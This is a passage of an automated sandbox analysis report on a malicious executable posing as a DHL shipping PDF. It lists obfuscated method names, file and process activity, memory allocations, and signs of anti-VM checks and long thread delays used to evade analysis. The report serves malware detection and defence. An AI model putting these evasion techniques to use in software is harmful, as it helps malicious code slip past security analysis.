                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, c4yKy3CLwkeiWGwXdd.csHigh entropy of concatenated method names: 'tYwb3WbQVH', 'NMRbGSj1nK', 'IwobHsr46o', 'diQbxYZN3q', 'v4pbhyqGDs', 'J0sbZ8hH8s', 'EASbqitMqu', 'D1SblFfRid', 'UyqbEXkSM1', 'iQhb7WCqVK'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, Ky9CtO3e8NlRrU9j3G.csHigh entropy of concatenated method names: 'zSrS4ypo3S', 'NQOSnuEwIF', 'teAS3pvrj7', 'Gk9SG3ZZoZ', 'La1SNVXUiP', 'rirSrTE8hb', 'C1YSKdp0n3', 'sjPSuXIL5t', 'U6mS1PUuLG', 'l2NSeBJ0vy'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, SG6efAkArUXHEYuTWX.csHigh entropy of concatenated method names: 'oYvjU4yKy3', 'twkjmeiWGw', 'e5OjWhQ2cN', 'AxljQyouWD', 'XbAjS6mgUp', 'wiVjt6TAwV', 'UFYeod6K0c70slFaqj', 'RKRdjxdTD59dE3RjXF', 'atoYCPqAkb9wYgo8Ak', 'xGpjj868bQ'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, YYFH038Fg7Ba4dVsZ8.csHigh entropy of concatenated method names: 'xZK6CsO3kl', 'B866oNVtjS', 'GDf6YbXpCU', 'Q2y6NchCKB', 'YUa6KR7Voj', 'vF56uZY3Wb', 'XR76egnJgD', 'ni56fqCrIQ', 'yP664N23S3', 'duL6AJYNIM'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, fcbQ2DbICkakXMZwoF.csHigh entropy of concatenated method names: 'Dispose', 'm7rjEEFNpu', 'mTjvNTmPhA', 'BqJg2ZYn3E', 'Xvsj7BjyOs', 'mjpjzajE0U', 'ProcessDialogKey', 'Hqfvc4Ujf4', 'iKKvjTYNcj', 'JXfvvRhnG4'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, Tj361az0V1Ld0cf4gr.csHigh entropy of concatenated method names: 'VEV92ZRDJg', 'jRy9CiZhan', 'm489oib1yt', 'KCG9YZ4otx', 'ikX9NX6Eym', 'PaI9Kxnwok', 'GYP9uakD2w', 'Vqy9sWWlg9', 'be29DwLv7T', 'kkx9pclC5a'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, tXGowko5OhQ2cNTxly.csHigh entropy of concatenated method names: 'So0ITgMSXe', 'FhQI2JtAHI', 'pdTICAojWt', 'N1KIo3raUM', 'yBBISbKuVY', 'BUHItUMlkH', 'POmIMKwVke', 'SK3I5rIhmI', 'REwIaAeDM0', 'IVSI9cKEUi'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, M4Ujf4EwKKTYNcjuXf.csHigh entropy of concatenated method names: 'm5vaYJSEou', 'iupaNXufuq', 'vniar9iIOR', 'pg9aK1IuGS', 'xEOauLnE4F', 'qP2a1VprV5', 'rCdaeacPbl', 'g68afaEMae', 'Rlma088xJw', 'jXIa4bWvXy'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, ygJQObIlKrQWvchxKd.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ogtvEASb2j', 'B4Kv7MLw5C', 'xFYvzpqRRv', 'm9YXceQD82', 'lNcXjnPDms', 'k02XvCeEPW', 'sXlXXFjTVE', 'OmpC5hF9i2mXr0Q1HZ4'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, Ikv8N3HYv9CSW5eDE4.csHigh entropy of concatenated method names: 'ToString', 'xtQtAqQt2y', 'XdptNZT9ch', 'Tiytr4raKZ', 'CYItKxWKO5', 'urotu42rVO', 'O3Kt1TryVT', 'G5Vte6556p', 'bUotf8vo1w', 'DwLt0e4t3x'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, T9AcilZkX1nbqZn73F.csHigh entropy of concatenated method names: 'tZjMlnikRc', 'ThmM77ce0Q', 'Usg5cusg83', 'siP5jhWfXW', 'dUaMAxka2R', 'D9rMn6u9V8', 'CKFM8x4tGq', 'zJMM3GXiqQ', 'cqmMGhW4Wk', 'b82MHSTFb4'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, AYAsSq0sXguNnJDAQA.csHigh entropy of concatenated method names: 'qWUUD3HZCn', 'zLVUpFauKV', 'fjGUyXsU85', 'rVhUT1twfJ', 'LkDUi0Y4PV', 'd6CU27fU2L', 'fgtUJfctyU', 'vIyUCUD89R', 'DLIUo1OPma', 'o4iUPRs12E'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, Q2fOA1qatW7rEFNpul.csHigh entropy of concatenated method names: 'eOiaSWugiR', 'jxVaMNaTgg', 'Ef1aaWHtPa', 'tJ5aLHteCb', 'Op3aF1gLlw', 'uCKasOCjkk', 'Dispose', 'OJF5ReNk9w', 'iTH5b7cxN9', 'sEo5IeuCNd'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, EuWDX0P92e5X6lbA6m.csHigh entropy of concatenated method names: 'WfUwiGtg3w', 'n5SwJ043wG', 'S2OIrMVgYd', 'UGCIKTnVL2', 'XM2IuDCqni', 'zRNI128TCc', 'QonIe0vrum', 'KjUIfJQn1w', 'MrAI0fGKm4', 'yCYI40dEI5'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, ye4SI0eTwELSnnrSOG.csHigh entropy of concatenated method names: 'quxURvpZTX', 'TokUIwhOJn', 'GDnUVBL5Lp', 'NyiV7J985B', 'YFpVzOQgtD', 'uB2UcxcI9J', 'h2PUjIhHX2', 'YnQUvsdFZm', 'vhEUXC2QT6', 'oIsUk4mwRt'
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile created: \dhl shipping details ref id 446331798008765975594-pdf.exe
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile created: \dhl shipping details ref id 446331798008765975594-pdf.exeJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 4EF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 5620000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 6620000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 6750000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 7750000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: C020000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: A920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: D020000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: E020000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F027301 sldt word ptr [eax]0_2_0F027301
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239890Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239781Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239671Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239562Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239453Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239344Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239233Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 239063Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 238952Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 238843Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 238632Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599714Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599483Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599265Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599156Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599046Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598937Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598718Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598499Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598390Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598171Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597953Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597843Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597734Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597624Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597296Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597187Jump to behavior
